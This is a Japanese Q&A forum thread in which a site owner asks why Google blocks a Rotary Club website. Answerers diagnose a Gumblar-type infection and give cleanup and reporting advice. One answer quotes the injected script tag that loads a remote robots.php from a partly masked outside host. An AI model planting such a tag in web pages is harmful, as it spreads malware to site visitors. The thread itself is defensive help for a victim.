- 締切済み
googleで危険と判定され、ブロックされたwebサイトについて
家内が制作を請け負っているwebサイトが、先月からgoogleでブロックされたまま解除されません。URL:http://www.yasurc.***/ です。 このサイトは国際的奉仕団体であるロータリークラブの支部のもので、決しておかしなサイトではありません。googleの判定によれば、 「このウェブサイトにアクセスすると、コンピュータに損害が生じる可能性があります。」とのことで、セーフブラウジングのページを開くと、「yasurc.*** の現在のステータス:疑わしいサイトとして認識されています。このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。 過去 90 日間に、このサイトの一部で不審な動きが 1 回報告されています。 Google による巡回テスト状況:このサイトで過去 90 日間に Google がテストした 13 ページのうち 3 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。Google が最後にこのサイトを巡回したのは2009-12-10で、このサイトで不審なコンテンツが最後に検出されたのは2009-11-17です。」という内容で、どうもスパイウェアに感染したような意味にとれます。 一度原ファイルをウィルスソフトで完全スキャンした上で、サーバー上のすべてのファイルを削除し、改めてサイトを転送し直しましたが、未だに上記の表示が出ます。ただ、11/17以降はその不審なコンテンツは見つかっていないようなので、今のwebページはたぶん大丈夫のようです。googleのこのブロックを解除する方法がわかりません。どなたかご教授願います。ちなみに、gooやyahoo!から検索すると何も引っかかりません。
- moto-kit
- お礼率100% (7/7)
- スパイウェア
- 回答数5
- ありがとう数17
- みんなの回答 (5)
- 専門家の回答
みんなの回答
- John_Papa
- ベストアンサー率61% (1186/1936)
大変でしょうが、ご検討をお祈りします。 ウイルスが片付きましたら、サイトのファイルを点検もしくは、全削除してアップロードしなおして、デトロイトのサーバーのように、ウイルスもしくはそのダウンロードスクリプトの置き場にされる懸念を払拭してください。ハードディスク付きテレビでさえボットネットに取り込まれる時世ですから。 「家電もマルウェアに感染する時代」 http://www.itmedia.co.jp/enterprise/articles/0912/22/news006.html まだ、この相談は閉じられてないようですから蛇足ながら読者の参考になればと、ここを借りてGumblar系ウイルスについて最近の状況を記しておきます。 Gumblar系ウイルスはごく普通のサイトに仕掛けられています。サイト管理者も換算されたことを知らないで他人から知らされるのがほとんどです。 そして統計的なデータでは日本のインターネット加入者15人に一人は自分のPCが感染している事を知りません。 その数値の根拠は「実はBlasterやNetsky並み? 静かにはびこるGumblar」 http://www.atmarkit.co.jp/fsecurity/column/kawaguchi/021.html にあります。 最近ニュースになったホットなものには、 「JR東日本のサイトが約2週間にわたり改ざん状態 - 閲覧でウイルス感染のおそれ」 http://www.security-next.com/011734.html というように、感染サイトを選びません。 セキュリティソフトメーカーには、もっと対策努力を期待します。現状はザルよりひどい状況と言わざるを得ません。感染したPCではもはやそのウイルスを検出できないという悩ましい状況もあります。 対策(自己防衛策)は 「相次ぐ「Webウイルス」に緊急警告、Adobe ReaderやFlashを最新版に」 http://pc.nikkeibp.co.jp/article/news/20091224/1021789/ それと、WindowsUpdate・MicrosoftUpdateの最新版を適応しておくこと、IE7以前のブラウザを使用しないことなどが挙げられます。 一応12月7日のセキュリティ更新プログラムで対策されましたけど、この更新前のIE6やIE7で改ざんされたサイトを閲覧したら防ぎようが無かったのです。 http://www.microsoft.com/japan/technet/security/bulletin/ms09-072.mspx ネット加入者15人に一人は感染者。決して人事ではない数字の筈です。
- John_Papa
- ベストアンサー率61% (1186/1936)
No.3です。 現在、デトロイトの個人宅サーバーは稼動中です。 問題のスクリプトは、5.6Kバイトの暗号化されたスクリプトでした。 Kaspersky で Trojan-Downloader.JS.Gumblar.x Trendmicroではない同名のVirusBuster で JS.Crypt.DMX として検出されます。Gumblarスクリプトの検出率はいつもこの程度です。 http://www.virustotal.com/jp/analisis/98eca65a2b409df496b101c48c4a40f51794243ddc314d2995ca89512d80f1e9-1261356115 FTPによる改ざんなら、OCNにver/log/xferlogの調査を依頼して、特に海外IPからのFTP接続が無いか調べてもらってください。 ご使用のOCNのWebサーバーが調査ではRapidsite/Apaと出るのですが、ターミナル(SSH)のセキュリティに脆弱性があるようにも見うけられます。 http://www.osbsd.net/2005/08/rapidsiteapa.html SSHへの攻撃やLoginは同様にver/log/messagesに記録されていますので調べてもらってください。 IPA(独立行政法人情報処理推進機構)に届けを出すためにLOGを貰うと良いでしょう。 またIPAで指導もしてもらえるでしょう。 http://www.ipa.go.jp/security/index.html
お礼
再度、大変詳しい説明をしていただき、感謝の言葉もありません。ただ、このレベルまでくると、私の拙い知識では対処しかねますので、いただいた情報をもとに専門業者に頼んでみようと思います。重ね重ねありがとうございました。
- John_Papa
- ベストアンサー率61% (1186/1936)
サイトのトップページを調べさせていただきました。 URLは伏字にしましたが、次の2行目に覚えがなければバッチリ【改ざん】されています。 ---------------------------- </HEAD> <script src=http://***.us/***/robots.php ></script> <BODY background="syuho/kabe27.jpg" link="#0000ff"> ---------------------------- 暗号化されていないためカスペルスキーやavast!でも無警告です。 挿入位置は、5月頃のGumblarと同じく</HEAD>と<BODY>の間です。 改ざん犯は以前と違ってスクリプトを暗号化しなくなっています。 このアドレスはデトロイトの個人宅サーバーのようですが、私のアクセスした時間には稼動していなかったようで、指定されたスクリプトにアクセスできませんでした。 稼動中なら感染攻撃を受けたでしょう。 この作業は危険ですのでまねしないように。 googleの警告は全く正しく行われていると言えるでしょう。 考えられる事は、moto-kitさんの奥様のPCもしくはPCの繋がっているLANのPCやサーバーがGumblar系のウイルスに感染しています。 最近のGumblarウイルスはほとんど症状に気がつきません。またウイルス対策ソフトから身を隠す術を持っています。 ウイルス定義の自動更新ができていないなら感染可能性大です。 手動でもウイルス定義が更新できないようでしたら、職業上PCのリカバリをお勧めします。また、サイトのFTPパスワードの変更も必要です。 FTPログインする人が他にいるなら、そちらに感染があるのかも知れません。
お礼
大変詳しい解説と、危険を伴う分析までしていただき、ありがとうございました。ソースを確認したのですが、ご指摘頂いたスクリプトの記述は、もちろん覚えがありませんが、どこにあるのか私には見つけられませんでした。ただ、googleに再審査依頼をしたところ、やはり状態は同じでしたので、改善はされていませんでした。PCのリカバリは、その手間を考えると逡巡してしまうのですが、検討させて頂きます。FTPパスワードは変更してみます。他にはログインする人はいません。
- tabotabo55
- ベストアンサー率32% (172/532)
まずホームページが改ざんされた方が大問題です。 ドメインでIPアドレスを調べたところ、たぶん、OCNまたはNTTコミュニケーションズのレンタルサバーようです。 なので、上記契約プロバイダーへの報告と原因解明を行ってください。
お礼
ありがとうございました。OCNのホスティングサービスを利用していますので、連絡して対応方法を聞いたのですが、思わしい回答はありませんでした。
補足
ご回答ありがとうございます。ご指摘のとおり、OCNのホスティングサービスを利用していますので、OCNに原因究明を依頼してみたのですが、わかないという返事でした。いくつかアドバイスももらいましたが、あまり役に立ちませんでした。
- pthread
- ベストアンサー率42% (3/7)
サイトの再審査をリクエストする http://www.google.com/support/webmasters/bin/answer.py?answer=45432#3 使用したことがありませんが、どうでしょうか。
お礼
ありがとうございます。再審査を依頼したところ、やはり感染しているようでした。
関連するQ&A
- グーグルが危険と判断したサイトについて
すいません。ヨーロッパのとある企業のウェブサイトなのですが 攻撃サイトとして報告されています! 疑わしいサイトとして認識されています。このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。 過去 90 日間に、このサイトの一部で不審な動きが 2 回検出されています。 このサイトで過去 90 日間に Google がテストした 4 ページのうち 1 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。 上記のように表示されて昨日から急に見れなくなりました。こんどある商材を取引予定で成分表などもそのウェブサイトに記載されていたため見れないと非常に困ります。 2日ほどこの状態なのですが相手にこの件を言った方が良いでしょうか? 自身のウェブサイトが見れないのですからすぐ気づくと思いまして様子を見ていたのですが・・。 上記の警告が出た場合はほぼ確実にサイトなどが不正に改ざんされているのでしょうか? (グーグルの間違いということはないでしょうか?) 商材のサンプルなども届いて、話を進めたいのですがウェブサイトが見れない状態というのは 万国共通でしょうか?(相手国では普通に見れたりなどするのでしょうか?) アドバイスいただけると助かります
- ベストアンサー
- その他(インターネット接続・通信)
- WEBサイトをブロックブロックしました。
WEBサイトをブロックブロックしました。 メールの中のアドレスをクリックすると 「ウイルスバスター2010によりwebサイトをブロックしました。このページにサイトをアクセスすることは出来ません。URLフィルタによりこのカテゴリのWebサイトはブロックされています。」と出ました。 このカテゴリのWebサイトのブロックをはずすにはどうすれば良いのでしょうか? 教えて下さい。 Windows 7 Windows Live メール ウイルスバスター 2010
- ベストアンサー
- ウィルス・マルウェア
- 自分のサイトが危険?!
googleで自分のサイトを検索すると、 「このウェブサイトにアクセスすると、コンピュータに損害が生じる可能性があります。」 と表示されてしまいます。。。 HP作成に関しては、ほぼ素人なので難しいことはしていないのですが、 ホームページビルダーのHotMediaアニメーションを一部利用しています。 yahooやgooでは、検索して何事も無くそのページの飛べるのですが、googleだけこのように表示されてしまいます。 何故なのかお解りの方、その理由や解決策を教えていただければと思います。 お願いします。
- 締切済み
- その他(インターネット・Webサービス)
- ある特定のサイト、ページにアクセスしようとするとブロックされ、さらに別
ある特定のサイト、ページにアクセスしようとするとブロックされ、さらに別ページに飛ばす方法ってありますか? コンテンツアドバイザでは別ページに飛ばすところか検索サイト(google,yahoo!)から検索してみたら簡単にアクセスできてしまいます。コンテンツアドバイザでアクセス制限に設定したページのURLを入力すれば「コンテンツアドバイザによりアクセスできません」と表示されるのですが…。 URLからでなく検索サイトから普通にアクセスした場合、別ページに飛ばされるような形でブロックされる方法を知りたいのですが…ご存知の方、回答お願いします! windows XPです。
- ベストアンサー
- Windows XP
- 自HPGoogle検索結果「このサイトはコンピュータに損害を与える可能性があります。」と表示される
自作HPのGoogle検索結果に 「このサイトはコンピュータに損害を与える可能性があります。」と 表示されるようになりました。 googleのトラブルではないようです。 メッセージを見ると 「過去 90 日間に、このサイトの一部で不審な動きが 2 回報告されています。 oogle による巡回テスト状況 このサイトで過去 90 日間に Google がテストした 313 ページのうち 77 ページで、 ユーザーの同意なしに不正なソフトウェアがダウンロードされ、 インストールされていたことが判明しました。 Malicious software includes 371 scripting exploit(s). 不正なソフトウェアは martuz.cn/, gumblar.cn/ を含む 2 個のドメインでホストされています。」などとあるので、 ウィルスソフトでチェックしてみたのですが、 特に変なものは出てきませんでした。 この内容の意味も良く分からないのですが、 一体どうしたら改善されるのかがわかりません。 この状況を改善したいのですが、 どうしたら良いでしょうか? 非常に困っています。 お教え頂ければ幸いで宇。
- ベストアンサー
- ネットトラブル
- googleで検索すると・・・
googleでキーワードを検索すると全て「このサイトはコンピュータに損害を与える可能性があります。」と警告がでるようになってしまい、 そのサイトにアクセスをすると、【不正なソフトウェアの警告】として「警告- このウェブサイトにアクセスすると、 コンピュータに損害が生じる可能性があります。」という表示がでてしまいます。 YAHOOで検索をしたものは閲覧可能なのですが。。 これは私のPCが何かウイルスに感染してしまったからなのでしょうか?? PC初心者でして、よろしければ対処法をお教え願います。
- ベストアンサー
- ウィルス・マルウェア
- WEBサイトブロック
WEBサイトがブロックされます。解除する方法は ※OKWAVEより補足:「ESETセキュリティ ソフトウェア シリーズ」についての質問です。
- ベストアンサー
- ウィルス・マルウェア
- HPのウィルス感染について
私が依頼されて制作したHPにタイトルのようなメッセージが表示されるようになりました。 私のPCがウィルスに感染したのではなく、依頼したところのPCが感染したようです。PC感染については、業者に依頼し回復したようで、通常通りになったようです。 HPはGoogle、Yahooで上記のメッセージが出てしまいます。 Googleでセーフ ブラウジング診断を行ったところ、 ---------------------------------------------------------------------------------------------------------------- 疑わしいサイトとして認識されています。このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。 過去 90 日間に、このサイトの一部で不審な動きが 3 回検出されています。 Google がこのサイトを巡回したときの状況 このサイトで過去 90 日間に Google がテストした 3 ページのうち 3 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。Google が最後にこのサイトを巡回したのは 2012-05-30 で、このサイトで不審なコンテンツが最後に検出されたのは 2012-05-30 です。 不正なソフトウェアには 1 trojan(s), 1 exploit(s) などがあります。感染先のコンピュータで平均 11 個のプロセスが新たに発生しています。 不正なソフトウェアは 2 個のドメイン(framework-man.net/, ftp-security.com/ など)でホストされています。 1 個のドメイン(ftp-security.com/ など)がこのサイトの訪問ユーザーに不正なソフトウェアを配布する媒体となっていたようです。 このサイトは 1 個のネットワーク(AS9371 (SAKURA) など)でホストされていたことが判明しました。 ---------------------------------------------------------------------------------------------------------------- とのことでした。 この場合、サイトの元ネタは私が持っているので単純にアップしなおせば、問題ないでしょうか? それとも、 サイトの作り方(HTMLなど)に問題があり、そこを直さなければ再び感染する可能性があるのでしょうか? 一応、再度アップしなおしてみるつもり(特に直さずに)ですが、そのサイト自体に問題があるのであれば、しばらくすればまたは新しいウィルスが出たら感染してしまうのかなと思い ちょっと迷っています。
- 締切済み
- ウィルス・マルウェア
- グーグルがおかしい
よろしくお願いします。 先程からグーグルで検索しようとしても全ての項目で 警告- このウェブサイトにアクセスすると、コンピュータに損害が生じる可能性があります。 と表示されて一切の検索が出来ないでいます。 どうなっているのでしょうか。
- 締切済み
- その他(インターネット接続・通信)
- GooGleが変になりました
FireFoxを使っています。 Googleで検索をかけると、次のように マイクロソフト - ホーム <<<このサイトはコンピュータに損害を与える可能性があります。>>> Windows、Office、開発ツール、ビジネスソリューション、家庭用ソフト、ダウンロード、Xbox360 等の日本語版製品の紹介、技術情報やイベント情報。 <<< >>>の警告文が加わって、開こうとしても 警告- このウェブサイトにアクセスすると、コンピュータに損害が生じる可能性があります。 検索のヒント: * 前のページに戻って、他の検索結果を選んでください。 * 別のキーワードで検索してみてください。 または、ご自身の責任のもとで http://www.microsoft.com/JAPAN/ にアクセスできます。見つかった問題の詳細については、Google が提供するこのサイトのセーフ ブラウジング診断ページをご覧ください。 不正なオンライン ソフトウェアから保護する方法については、StopBadware.org をご覧ください。 サイトの管理者である場合は、Google のウェブマスター ツールを使用して、サイトの再審査を依頼できます。審査プロセスの詳細については、Google のウェブマスター ヘルプ センターをご覧ください。 などと出て、サイトにつながりません。 どうすればいいのでしょうか?
- ベストアンサー
- その他(ソフトウェア)
お礼
重ね重ねありありがとうございました。大変参考になりました。インターネットは便利な反面、怖い面があることを改めて教えて頂きました。